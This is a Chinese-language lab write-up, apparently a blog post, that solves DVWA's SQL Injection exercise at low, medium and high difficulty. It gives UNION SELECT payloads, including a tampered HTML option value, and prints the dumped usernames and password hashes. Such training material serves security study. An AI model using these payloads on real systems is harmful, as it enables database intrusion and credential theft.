DVWA - SQL Injection (low, medium, high)
2017-01-06 16:50
525 查看
low
查看源码,可发现是注入点id为字符类型,无验证,直接上:' union select first_name,password from users#
返回结果如下:
ID: ' union select first_name,password from users# First name: admin Surname: e2075474294983e013ee4dd2201c7a73 ID: ' union select first_name,password from users# First name: Gordon Surname: e99a18c428cb38d5f260853678922e03 ID: ' union select first_name,password from users# First name: Hack Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ID: ' union select first_name,password from users# First name: Pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ID: ' union select first_name,password from users# First name: Bob Surname: 5f4dcc3b5aa765d61d8327deb882cf99
medium
查看源码,发现代码用mysqli_real_escape_string来转义特殊字符,但是此时的注入点id为数值型,不需要用’。修改html源码提交:<option value="0 union select first_name,password from users">1</option>
返回结果如下:
ID: 0 union select first_name,password from users First name: admin Surname: e2075474294983e013ee4dd2201c7a73 ID: 0 union select first_name,password from users First name: Gordon Surname: e99a18c428cb38d5f260853678922e03 ID: 0 union select first_name,password from users First name: Hack Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ID: 0 union select first_name,password from users First name: Pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ID: 0 union select first_name,password from users First name: Bob Surname: 5f4dcc3b5aa765d61d8327deb882cf99
high
查看源码,可发现注入点id为字符型,查询记录限1,其实方法和low差不多' union select first_name,password from users#
返回结果如下:
ID: ' union select first_name,password from users# First name: admin Surname: e2075474294983e013ee4dd2201c7a73 ID: ' union select first_name,password from users# First name: Gordon Surname: e99a18c428cb38d5f260853678922e03 ID: ' union select first_name,password from users# First name: Hack Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ID: ' union select first_name,password from users# First name: Pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ID: ' union select first_name,password from users# First name: Bob Surname: 5f4dcc3b5aa765d61d8327deb882cf99
相关文章推荐
- DVWA - Brute Force (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - CSRF (low, medium, high)
- DVWA - File Inclusion (low, medium, high)
- DVWA - File Upload (low, medium, high)
- DVWA - XSS (Reflected) (low, medium, high)
- DVWA - XSS (Stored) (low, medium, high)
- DVWA - SQL Injection (Blind) (low)
- DVWA之low级别SQL Injection
- BZOJ4391: [Usaco2015 dec]High Card Low Card
- GENMASK_ULL 和GENMASK,产生high和low之间全是1的值
- dvwa学习之七:SQL Injection
- Codeforces Round #437 (Div. 2, based on MemSQL Start[c]UP 3.0 - Round 2)E - Buy Low Sell High
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- bzoj4391[Usaco2015 dec]High Card Low Card
- dvwa-sql injection(blind)
- Codeforces 867 E. Buy Low Sell High (贪心)
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- DVWA(V1.10)中Command Injection的high等级绕过
- low level descriptors and high level descriptors